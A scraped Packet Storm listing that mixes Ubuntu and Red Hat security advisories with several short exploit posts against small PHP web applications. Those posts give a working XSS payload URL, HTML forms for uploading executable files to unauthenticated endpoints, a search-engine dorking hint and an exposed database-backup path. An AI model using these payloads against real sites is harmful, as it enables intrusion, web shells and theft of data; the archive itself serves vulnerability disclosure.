Ubuntu Security Notice 7031-2 - USN-7031-1 fixedCVE-2024-45614 in Puma for Ubuntu 24.04 LTS. This update fixes theCVE for Ubuntu 22.04 LTS and Ubuntu 20.04 LTS. It was discovered that Puma incorrectly handled parsing certain headers. A remote attacker could possibly use this issue to overwrite header values set by intermediate proxies by providing duplicate headers containing underscore characters.

==========================================================================  
Ubuntu Security Notice USN-7031-2  
September 24, 2024

puma vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Puma could be made to overwrite headers if it received specially crafted  
network traffic.

Software Description:  
- puma: threaded HTTP 1.1 server for Ruby/Rack applications

Details:

USN-7031-1 fixed CVE-2024-45614 in Puma for Ubuntu 24.04 LTS.  
This update fixes the CVE for Ubuntu 22.04 LTS and Ubuntu 20.04 LTS.

Original advisory details:

It was discovered that Puma incorrectly handled parsing certain headers.  
A remote attacker could possibly use this issue to overwrite header values  
set by intermediate proxies by providing duplicate headers containing  
underscore characters.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS  
puma 5.5.2-2ubuntu2+esm2  
Available with Ubuntu Pro

Ubuntu 20.04 LTS  
puma 3.12.4-1ubuntu2+esm2  
Available with Ubuntu Pro

In general, a standard system update will make all the necessary changes.

References:  
https://ubuntu.com/security/notices/USN-7031-2  
https://ubuntu.com/security/notices/USN-7031-1  
CVE-2024-45614

Ubuntu Security Notice USN-7031-2

Online mcq System version 1.0 suffers from a cross site scripting vulnerability.

    =============================================================================================================================================| # Title     : Online mcq System 1.0 XSS vulnerability                                                                                     || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://www.kashipara.com/project/download/project2/user/2023/202304/kashipara.com_onlinemcq-zip.zip                        |=============================================================================================================================================[+] POC :[+] use Payload : feedback.php?q=Thank%2520you%2520for%2520your%2520valuable%2520feedback'"()%26%25<acx><ScRiPt >prompt(990455)</ScRiPt>   [+] http://127.0.0.1/onlinemcq/feedback.php?q=Thank%2520you%2520for%2520your%2520valuable%2520feedback%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(990455)%3C/ScRiPt%3EGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Online mcq System 1.0 Cross Site Scripting

Red Hat Security Advisory 2024-7101-03 - An update for httpd is now available for Red Hat Enterprise Linux 7 Extended Lifecycle Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_7101.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: httpd security updateAdvisory ID:        RHSA-2024:7101-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:7101Issue date:         2024-09-25Revision:           03CVE Names:          CVE-2024-38476====================================================================Summary: An update for httpd is now available for Red Hat Enterprise Linux 7 Extended Lifecycle Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 7-ELS Release Notes linked from the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-38476References:https://access.redhat.com/security/updates/classification/#importanthttps://docs.redhat.com/en/documentation/red_hat_enterprise_linux/7-ELS/html/7-ELS_release_notes/indexhttps://bugzilla.redhat.com/show_bug.cgi?id=2295015

Red Hat Security Advisory 2024-7101-03

Online Job Search System version 1.0 suffers from an arbitrary file upload vulnerability.

=============================================================================================================================================| # Title     : Online Job Search System 1.0 Remote File Upload Vulnerability                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.campcodes.com/downloads/online-job-search-system-using-php-mysql-source-code/?wpdmdl=8545&refresh=66bbf77f15e8c1723594623       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code uploads a executable malicious file remotely .[+] Go to the line 10.[+] Set the target site link Save changes and apply . [+] save code as poc.html .<!DOCTYPE html><html lang="en"><head>    <meta charset="UTF-8">    <meta name="viewport" content="width=device-width, initial-scale=1.0">    <title>Submit Application</title></head><body>    <h2>Submit Application</h2>    <form action="http://127.0.0.1/eris/process.php?action=submitapplication&JOBID=2" method="POST" enctype="multipart/form-data">                <div class="form-group">            <label for="picture">Upload your picture:</label>            <input type="file" name="picture" id="picture" required>        </div>                <div class="form-group">            <button type="submit">Submit</button>        </div>    </form></body></html>[+] path : http://127.0.0.1/eris/applicant/photosGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Online Job Search System 1.0 Arbitrary File Upload

Online Flight Booking System version 1.0 suffers from an arbitrary file upload vulnerability.

=============================================================================================================================================================================  
| # Title     : Online Flight Booking System 1.0 Remot File Upload vulnerability                                                                                            |  
| # Author    : indoushka                                                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                                                            |  
| # Vendor    : https://www.campcodes.com/downloads/online-flight-booking-management-system-source-code/?wpdmdl=5913&refresh=66bbf742d7abc1723594562                        |  
=============================================================================================================================================================================

[+] POC :

[+] The following html code uploads a executable malicious file remotely .

   [+] Line 28 : Set your Target.

[+] save payload as poc.html

[+] payload : 

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>RFU</title>  
</head>  
<body>

        <div class="form-group">  
      <label for="" class="control-label">Avatar</label>  
      <div class="custom-file">  
              <input type="file" class="custom-file-input rounded-circle" id="customFile" name="img" onchange="displayImg(this,$(this))">  
              <label class="custom-file-label" for="customFile">Choose file</label>  
            </div>  
    </div>

        <input type="button" value="Save User" onclick="saveUser()">  
    </form>

    <script>  
        function saveUser() {  
            var form = document.getElementById('userForm');  
            var formData = new FormData(form);

            var xhr = new XMLHttpRequest();  
            xhr.open("POST", "http://127.0.0.1/Online_Flight_Booking_Management_System/admin/ajax.php?action=save_settings", true);

            xhr.onload = function () {  
                if (xhr.status === 200) {  
                    alert('User saved successfully');  
                } else {  
                    alert('An error occurred while saving the user');  
                }  
            };

            xhr.send(formData);  
        }  
    </script>

</body>  
</html>

[+] Path : http://127.0.0.1/Online_Flight_Booking_Management_System/assets/img

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

Online Flight Booking System 1.0 Arbitrary File Upload

Red Hat Security Advisory 2024-7074-03 - Network Observability 1.6 for Red Hat OpenShift. Issues addressed include a denial of service vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_7074.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: Network Observability 1.6.2 for OpenShift  
Advisory ID:        RHSA-2024:7074-03  
Product:            Network Observability  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:7074  
Issue date:         2024-09-25  
Revision:           03  
CVE Names:          CVE-2024-24791  
====================================================================

Summary: 

Network Observability 1.6 for Red Hat OpenShift

Red Hat Product Security has rated this update as having a security impact of  
Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives  
a detailed severity rating, is available for each vulnerability from the CVE  
link(s) in the References section.

Description:

Network Observability 1.6.2

Security Fix(es):

* CVE-2024-24791 golang: net/http: Denial of service due to improper 100-continue handling in net/http

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-24791

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2295310  
https://issues.redhat.com/browse/NETOBSERV-1737

Red Hat Security Advisory 2024-7074-03

Ubuntu Security Notice 7031-1 - It was discovered that Puma incorrectly handled parsing certain headers. A remote attacker could possibly use this issue to overwrite header values set by intermediate proxies by providing duplicate headers containing underscore characters.

    ==========================================================================Ubuntu Security Notice USN-7031-1September 24, 2024puma vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 24.04 LTSSummary:Puma could be made to overwrite headers if it received specially craftednetwork traffic.Software Description:- puma: threaded HTTP 1.1 server for Ruby/Rack applicationsDetails:It was discovered that Puma incorrectly handled parsing certain headers.A remote attacker could possibly use this issue to overwrite header valuesset by intermediate proxies by providing duplicate headers containingunderscore characters.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 24.04 LTS  puma                            6.4.2-4ubuntu4.3In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-7031-1  CVE-2024-45614Package Information:  https://launchpad.net/ubuntu/+source/puma/6.4.2-4ubuntu4.3

Ubuntu Security Notice USN-7031-1

Red Hat Security Advisory 2024-6827-03 - Red Hat OpenShift Container Platform release 4.16.14 is now available with updates to packages and images that fix several bugs and add enhancements. Issues addressed include an open redirection vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6827.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: OpenShift Container Platform 4.16.14 security update  
Advisory ID:        RHSA-2024:6827-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:6827  
Issue date:         2024-09-24  
Revision:           03  
CVE Names:          CVE-2024-42353  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.16.14 is now available with updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container Platform 4.16.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.16.14. See the following advisory for the container images for this release:

https://access.redhat.com/errata/RHSA-2024:6824

Security Fix(es):

* webob: WebOb's location header normalization during redirect leads to  
open redirect (CVE-2024-42353)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

All OpenShift Container Platform 4.16 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.16/updating/updating_a_cluster/updating-cluster-cli.html

Solution:

https://docs.openshift.com/container-platform/4.16/release_notes/ocp-4-16-release-notes.html

CVEs:

CVE-2024-42353

References:

https://access.redhat.com/security/updates/classification/#moderate

Red Hat Security Advisory 2024-6827-03

Red Hat Security Advisory 2024-6824-03 - Red Hat OpenShift Container Platform release 4.16.14 is now available with updates to packages and images that fix several bugs and add enhancements.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6824.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: OpenShift Container Platform 4.16.14 security updateAdvisory ID:        RHSA-2024:6824-03Product:            Red Hat OpenShift EnterpriseAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6824Issue date:         2024-09-25Revision:           03CVE Names:          CVE-2024-3727====================================================================Summary: Red Hat OpenShift Container Platform release 4.16.14 is now available with updates to packages and images that fix several bugs and add enhancements.This release includes a security update for Red Hat OpenShift Container Platform 4.16.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat OpenShift Container Platform is Red Hat's cloud computingKubernetes application platform solution designed for on-premise or privatecloud deployments.Security Fix(es):* containers/image: digest type does not guarantee valid type(CVE-2024-3727)* golang-protobuf: encoding/protojson, internal/encoding/json: infiniteloop in protojson.Unmarshal when unmarshaling certain forms of invalid JSON(CVE-2024-24786)* Bare Metal Operator: BMO can expose particularly named secrets from othernamespaces via BMH CRD (CVE-2024-43803)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVEpage(s)listed in the References section.Solution:CVEs:CVE-2024-3727References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2268046https://bugzilla.redhat.com/show_bug.cgi?id=2274767https://bugzilla.redhat.com/show_bug.cgi?id=2302487https://bugzilla.redhat.com/show_bug.cgi?id=2309536https://issues.redhat.com/browse/OCPBUGS-24386https://issues.redhat.com/browse/OCPBUGS-34518https://issues.redhat.com/browse/OCPBUGS-36855https://issues.redhat.com/browse/OCPBUGS-37046https://issues.redhat.com/browse/OCPBUGS-37763https://issues.redhat.com/browse/OCPBUGS-37937https://issues.redhat.com/browse/OCPBUGS-38021https://issues.redhat.com/browse/OCPBUGS-38058https://issues.redhat.com/browse/OCPBUGS-38502https://issues.redhat.com/browse/OCPBUGS-38911https://issues.redhat.com/browse/OCPBUGS-39082https://issues.redhat.com/browse/OCPBUGS-39179https://issues.redhat.com/browse/OCPBUGS-39287https://issues.redhat.com/browse/OCPBUGS-39496https://issues.redhat.com/browse/OCPBUGS-41540https://issues.redhat.com/browse/OCPBUGS-41555https://issues.redhat.com/browse/OCPBUGS-41619https://issues.redhat.com/browse/OCPBUGS-41677https://issues.redhat.com/browse/OCPBUGS-41806https://issues.redhat.com/browse/OCPBUGS-41886https://issues.redhat.com/browse/OCPBUGS-41910

Red Hat Security Advisory 2024-6824-03

Multi Branch School Management System version 3.5 suffers from a backup disclosure vulnerability.

**Multi Branch School Management System 3.5 Backup Disclosure**

Posted Sep 25, 2024

Authored by indoushka

Multi Branch School Management System version 3.5 suffers from a backup disclosure vulnerability.

tags | exploit, info disclosure

SHA-256 | b4c3fb3408f8d7a80baf2b5ec0b035520c60a8b287134c61abe01863834639ea

Download | Favorite | View

**Multi Branch School Management System 3.5 Backup Disclosure**

    =============================================================================================================================================| # Title     : Multi Branch School Management System 3.5 Backup Disclosure Vulnerability                                                   || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://school.ramomcoder.com/                                                                                              |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Appears to leave backups in a world accessible directory under the document root.  [+] use Payload : /uploads/db_backup/[+] http://127.0.0.1/Multi/uploads/db_backup/Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,950)
*   Arbitrary (17,099)
*   BBS (2,859)
*   Bypass (1,925)
*   CGI (1,047)
*   Code Execution (7,919)
*   Conference (693)
*   Cracker (845)
*   CSRF (3,431)
*   DoS (25,293)
*   Encryption (2,395)
*   Exploit (54,302)
*   File Inclusion (4,275)
*   File Upload (1,020)
*   Firewall (822)
*   Info Disclosure (2,922)
*   Intrusion Detection (919)
*   Java (3,156)
*   JavaScript (908)
*   Kernel (7,304)
*   Local (14,858)
*   Magazine (587)
*   Overflow (13,225)
*   Perl (1,435)
*   PHP (5,281)
*   Proof of Concept (2,412)
*   Protocol (3,749)
*   Python (1,661)
*   Remote (31,903)
*   Root (3,672)
*   Rootkit (530)
*   Ruby (643)
*   Scanner (1,658)
*   Security Tool (8,050)
*   Shell (3,306)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,297)
*   SQL Injection (16,731)
*   TCP (2,463)
*   Trojan (690)
*   UDP (919)
*   Virus (675)
*   Vulnerability (33,121)
*   Web (10,143)
*   Whitepaper (3,785)
*   x86 (970)
*   XSS (18,304)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (430)
*   Apple (2,115)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,125)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,592)
*   HPUX (881)
*   iOS (390)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,327)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (490)
*   RedHat (16,893)
*   Slackware (941)
*   Solaris (1,615)
*   SUSE (1,444)
*   Ubuntu (9,867)
*   UNIX (9,458)
*   UnixWare (188)
*   Windows (6,772)
*   Other

Source

Packet Storm